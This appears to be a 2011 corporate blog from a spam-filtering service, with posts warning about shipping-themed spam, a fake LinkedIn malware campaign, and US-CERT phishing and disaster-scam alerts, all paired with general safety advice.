Tuesday, November 15, 2011

Shipping Related Spam Increase for the Holidays

At CudaMail, we've noticed lately that the recent wave of "Shipping-related" spam has been increasing. You know the ones - "Package Tracking Details", "Fedex Shipment Details" or "Express Tracking Notification". If you regularly deal with these companies it may not come as a surprise, but if you're not expecting a shipment, you may be thinking of clicking on the links to check this "shipment". As usual, it's a good idea to not click the links!  Try logging into your account on their actual website, or call them to check. With the coming Holidays, it's only natural to expect some shipments - and the spammers are taking advantage of this, and even dropping names like "Amazon" or major store names to try and lure you to click on their links and load their malware on your computer. - Take care when reading these emails, and be careful what you click on.    

Posted by at No comments:

Tuesday, August 30, 2011

How a LinkedIn notice could empty your bank account

How a LinkedIn notice could empty your bank account

An interesting article from BarracudaLabs.  We've all seen notices from "LinkedIn, FaceBook, Bank of America" etc. trying to come into people's email inboxes.
Like any email, we always suggest you make sure you know what you're clicking on before you click on it!
Some people have been learning the hard way with the latest "Linked In" malware delivery email campaigns.
Those behind the CudaMail system are protected from these types of campaigns.
Here's the Original Story:
By Dave Michmerhuizen & Luis Chapetti – Security Researchers Banks We see a lot of spam at Barracuda Labs.  Sometimes they're as simple and straightforward as a Viagra ad, but just as often they can be as serious and as devastating as an urban mugging.  We've been watching one of those muggings play out over the past few days, and it has reminded us that spam is nothing to take lightly. Early on the morning of August 23 the spam monitors at Barracuda Labs started detecting a large number of emails claiming to be from LinkedIn.  The quantities were significant, tens of thousands an hour, and these were pretty convincing messages. Linkedin spam As convincing as they may be these emails have nothing to do with LinkedIn.  The from address is fake and the "Follow this link" hyperlink leads to one of a set of recently registered domains deliberately set up to serve malicious content LinkedIn spam   Most of these sorts of spam attacks simply link to a malware file which the browser then downloads and offers to run. If an antivirus doesn't intercept such a file then Windows will ask for permission to run it and it is easy enough to say no. But this attack is different and much more serious. Each of the malicious domains such as linkedin-reports.com or linkedin-alert.com hosts an exploit kit, a set of malicious payloads that quietly attempt to take advantage of weaknesses in the Web browser and its helper applications. Clicking on the "follow this link" hyperlink in the message doesn't appear to have any effect. Nothing seems to happen; however there is a lot going on behind the scenes. Below is what the behind-the-scenes network traffic looked like.
Network traffic of exploits(Click for larger image)
This traffic capture shows a series of attacks against Internet Explorer (1), against the Adobe PDF reader plug-in (2) and finally against Windows Media Player (3).  Eventually these exploits result in the download of Trojan.Jorik (4). Trojan.Jorik is a password stealer which gets right to work, periodically checking in with its command and control server (5). After contacting the control server the Trojan contacts another server (6) for an interesting – and somewhat scary – configuration file.
Update with phishing HTML(Click for larger image)
  These password-stealing Trojans are programmed to insert themselves into the browser stack and can intercept login pages even before they are encrypted by HTTPS.  The list above shows the services that the Trojan is being configured to monitor.  There is more configuration that is not shown in this graphic – pages of HTML code snippets to be injected into login pages. When a login page for one of the monitored sites is displayed, the corresponding code snippet is added to the page. These code snippets ask for additional security questions or special passwords, information the password thieves want but questions that the legitimate login page does not ask. Having your online banking credentials stolen is serious stuff, especially if the credentials belong to an organization or business with a hefty bank balance.  Consider the most recent story from Brian Krebs about the Cyber Theft of $217,000 from a nonprofit in Nebraska.   With so much spam circulating through email servers worldwide, it is easy to become insensitive to the very real danger that  truly malicious spam poses.  Never let down your guard, and never ever follow links in emails even if they appear to be official looking. As you can see from this example, one click can be all it takes.


Posted by at No comments:

Thursday, June 23, 2011

Top 5 Things to Know Before Choosing a Spam Filtering Service

There's a new guide available on CudaMail.com that talks about things you need to know before choosing a Spam Filtering service. Some firms do their own spam and virus filtering with an appliance like the Barracuda Spam & Virus Firewall, .  However, some don't have their own I.T. resources, or simply don't want to manage their own appliance. That's the advantage of a "Cloud-Based" Spam Filtering service - it's set up for you, and managed for you.  You also don't have to bother with updating spam definitions or other subscriptions. There are several services available on the web, but it's important to ask yourself some questions like: Is it important to be able to contact them (and talk to a live person) easily? Can I add people to my whitelist or blacklist? It's a free downloadable guide, so if you want to get some tips on choosing a spam filtering service, you can  check it out easily.  There an opt-in form on the top right of the site, and after confirming with AWeber, you get a link to the guide.

Posted by at No comments:

Thursday, June 2, 2011

US-Cert Reports Gmail Phishing Attack

US-Cert recently published an article about a new phishing attack, which is aimed as specific targets in the US Government.

The Story:

US-CERT is aware of public reports of a phishing attack that specifically targets US government and military officials' Gmail accounts. The attack arrives via an email sent from a spoofed address of an individual or agency known to the targeted user. The email contains a "view download" link that leads to a fake Gmail login page. The login information is then sent to an attacker. Google has indicated that this phishing campaign has been disrupted and that affected parties have been notified.

  • US-CERT encourages users and administrators to do the following to help mitigate the risks:
  • Review the Google blog entry Ensuring your information is safe online.
  • Do not follow unsolicited web links or attachments in email messages.
  • Use caution when providing personal information online.
  • Verify the legitimacy of the email by contacting the organization directly through a trusted contact method.
  • Refer to the Recognizing and Avoiding Email Scams (pdf) document for more information on avoiding email scams.
  • Refer to the Avoiding Social Engineering and Phishing Attacks document for more information on social engineering attacks.
  • Refer to the Using Caution with Email Attachments document for more information on safely handling email attachments.

Relevant Url(s):

http://www.us-cert.gov/cas/tips/ST04-014.html

http://www.us-cert.gov/reading_room/emailscams_0905.pdf

http://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html

http://www.us-cert.gov/cas/tips/ST04-010.html

 

Original Article:  http://www.us-cert.gov/current/index.html#gmail_phishing_attack



Posted by at No comments:

Friday, March 18, 2011

Ongoing Phishing Attack targeting PayPal, Bank of America, Lloyds and TSB

This new story by US-CERT shows they have become aware of reports on a new phishing attack. Apparently it's bypassing some of the new phishing protection built-in to many browsers. The team at CudaMail have also noted the new campaign (fortunately with a global network of 100,000 spam firewalls feeding "zero hour" threat information to the reputation database, it begins thwarting such campaigns very early), and have been successfully blocking it.

The US-CERT Story:

US-CERT is aware of public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment.Email Phishing Scams This attack is unlike common phishing attacks because it locally stores the malicious webpage rather than directing user to a phishing site via a URL. Many browsers utilize anti-phishing filters to help protect users against phishing attacks, this method of attack is able to bypass this security mechanism. US-CERT encourages users and administrators to take the following measures to protect themselves from these types of phishing attacks:
  • Do not follow unsolicited web links or attachments in email messages.
  • Use caution when providing personal information online.
  • Verify the legitimacy of the email by contacting the organization directly through a trusted contact method.
Relevant Url(s): Link to the original story.

Posted by at No comments:

Tuesday, March 15, 2011

Japan EarthQuake and Tsunami Email Scams

We see it all the time. Spammers and malware writers try to exploit all kinds of traumas and disasters. The recent earthquake and tsunami disasters in Japan are no exception - so the anti-spam community should be prepared for the onslaught.

US-CERT recently posted a warning about impending Phishing and Malware email scams regarding Japan's recent earthquake and the resulting tsunami disaster:

- original story below:

US-CERT Current Activity

Japan Earthquake and Tsunami Disaster Email Scams, Fake Anitvirus and Phishing Attack Warning

Original release date: March 11, 2011 at 10:14 am Last revised: March 11, 2011 at 10:14 am

US-CERT would like to warn users of potential email scams, fake antivirus and phishing attacks regarding the Japan earthquake and the tsunami disasters. Email scams may contain links or attachments which may direct users to phishing or malware-laden websites. Fake antivirus attacks may come in the form of pop-ups which flash security warnings and ask the user for credit card information. Phishing emails and websites requesting donations for bogus for charitable organizations commonly appear after these types of natural disasters.

US-CERT encourages users to take the following measures to protect themselves:

  • Do not follow unsolicited web links or attachments in email messages.
  • Maintain up-to-date antivirus software.
  • Review the Federal Trade Commission's Charity Checklist.

Verify the legitimacy of the email by contacting the organization directly through a trusted contact number. Trusted contact information can be found on the Better Business Bureau National Charity Report Index.

You can find the original story here.



Posted by at No comments:
Subscribe to: Posts (Atom)